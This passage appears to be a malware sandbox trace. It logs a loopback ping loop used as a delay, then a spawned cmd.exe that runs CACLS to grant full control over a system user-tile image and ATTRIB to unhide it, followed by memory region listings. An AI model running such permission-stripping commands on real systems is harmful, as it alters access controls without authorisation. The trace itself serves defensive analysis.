dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0181.372] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0181.372] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0181.372] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0181.379] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0181.379] LocalFree (hMem=0x2c8f90) returned 0x0 [0181.379] Sleep (dwMilliseconds=0x3e8) [0182.406] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0182.426] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0182.426] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0182.426] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0182.426] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0182.426] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0182.426] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0182.426] LocalFree (hMem=0x2c51e0) returned 0x0 [0182.426] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0182.426] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0182.426] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0182.426] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0182.427] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0182.427] LocalFree (hMem=0x2c2a10) returned 0x0 [0182.427] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0182.427] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0182.427] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0182.427] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0182.427] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0182.428] LocalFree (hMem=0x2c8f90) returned 0x0 [0182.428] Sleep (dwMilliseconds=0x3e8) [0183.529] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0183.605] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0183.605] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0183.605] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0183.605] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0183.605] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0183.605] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0183.605] LocalFree (hMem=0x2c51e0) returned 0x0 [0183.605] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0183.605] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0183.605] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0183.605] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0183.605] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0183.605] LocalFree (hMem=0x2c2a10) returned 0x0 [0183.605] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0183.605] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0183.605] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0183.605] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0183.606] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0183.606] LocalFree (hMem=0x2c8f90) returned 0x0 [0183.606] Sleep (dwMilliseconds=0x3e8) [0184.706] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0184.843] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0184.843] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0184.843] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0184.843] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0184.843] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0184.843] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0184.843] LocalFree (hMem=0x2c51e0) returned 0x0 [0184.843] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0184.843] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0184.843] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0184.843] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0184.843] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0184.843] LocalFree (hMem=0x2c2a10) returned 0x0 [0184.844] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0184.844] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0184.844] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0184.844] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0184.844] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0184.844] LocalFree (hMem=0x2c8f90) returned 0x0 [0184.844] Sleep (dwMilliseconds=0x3e8) [0185.867] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0185.897] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0185.897] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0185.897] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0185.897] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0185.897] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0185.897] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0185.897] LocalFree (hMem=0x2c51e0) returned 0x0 [0185.897] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0185.897] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0185.897] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0185.897] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0185.897] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0185.897] LocalFree (hMem=0x2c2a10) returned 0x0 [0185.897] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0185.897] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0185.897] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0185.897] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0185.898] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0185.898] LocalFree (hMem=0x2c8f90) returned 0x0 [0185.898] Sleep (dwMilliseconds=0x3e8) [0186.920] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0186.934] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0186.934] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0186.934] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0186.934] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0186.934] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0186.934] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0186.934] LocalFree (hMem=0x2c51e0) returned 0x0 [0186.934] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0186.934] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0186.935] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0186.935] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0186.935] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0186.935] LocalFree (hMem=0x2c2a10) returned 0x0 [0186.935] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0186.935] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0186.935] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0186.935] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0186.935] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0186.935] LocalFree (hMem=0x2c8f90) returned 0x0 [0186.935] Sleep (dwMilliseconds=0x3e8) [0187.948] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0188.012] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0188.012] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0188.012] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0188.012] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0188.012] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0188.012] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0188.012] LocalFree (hMem=0x2c51e0) returned 0x0 [0188.012] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0188.012] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0188.012] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0188.012] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0188.012] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0188.013] LocalFree (hMem=0x2c2a10) returned 0x0 [0188.013] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0188.013] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0188.013] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0188.013] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0188.013] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0188.013] LocalFree (hMem=0x2c8f90) returned 0x0 [0188.013] Sleep (dwMilliseconds=0x3e8) [0189.081] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0189.094] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0189.094] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0189.094] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0189.094] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0189.094] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0189.094] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0189.094] LocalFree (hMem=0x2c51e0) returned 0x0 [0189.094] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0189.094] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0189.094] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0189.094] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0189.095] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0189.095] LocalFree (hMem=0x2c2a10) returned 0x0 [0189.095] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0189.095] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0189.095] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0189.095] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0189.095] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0189.095] LocalFree (hMem=0x2c8f90) returned 0x0 [0189.095] Sleep (dwMilliseconds=0x3e8) [0190.118] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0190.130] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0190.130] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0190.130] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0190.130] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0190.130] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0190.130] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.130] LocalFree (hMem=0x2c51e0) returned 0x0 [0190.130] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0190.130] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0190.130] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0190.130] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0190.130] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.130] LocalFree (hMem=0x2c2a10) returned 0x0 [0190.130] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0190.130] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0190.130] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0190.131] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0190.140] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.140] LocalFree (hMem=0x2c8f90) returned 0x0 [0190.140] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf6d0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0190.140] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xcf6a0, nSize=0x0, Arguments=0xcf69c | out: lpBuffer="\x88\x15\x2d") returned 0x58 [0190.140] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", lpszDst=0x2d1588, cchDstLength=0x58 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n") returned 1 [0190.140] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0190.140] _write (in: _FileHandle=1, _Buf=0x2d1588*, _MaxCharCount=0x58 | out: _Buf=0x2d1588*) returned 88 [0190.141] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.141] LocalFree (hMem=0x2d1588) returned 0x0 [0190.141] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xcf6b0, nSize=0x0, Arguments=0xcf6ac | out: lpBuffer="\x98\x15\x2d") returned 0x61 [0190.141] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x2d1598, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0190.141] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0190.141] _write (in: _FileHandle=1, _Buf=0x2d1598*, _MaxCharCount=0x61 | out: _Buf=0x2d1598*) returned 97 [0190.141] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.141] LocalFree (hMem=0x2d1598) returned 0x0 [0190.141] IcmpCloseHandle (IcmpHandle=0x2c8bb0) returned 1 [0190.158] LocalFree (hMem=0x2c38f0) returned 0x0 [0190.158] LocalFree (hMem=0x2cec28) returned 0x0 [0190.158] WSACleanup () returned 0 [0190.411] exit (_Code=0) Thread: id = 443 os_tid = 0x390 Thread: id = 444 os_tid = 0xc08 Thread: id = 446 os_tid = 0xa6c Process: id = "328" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24894 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24895 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24896 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24897 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 24898 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24899 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 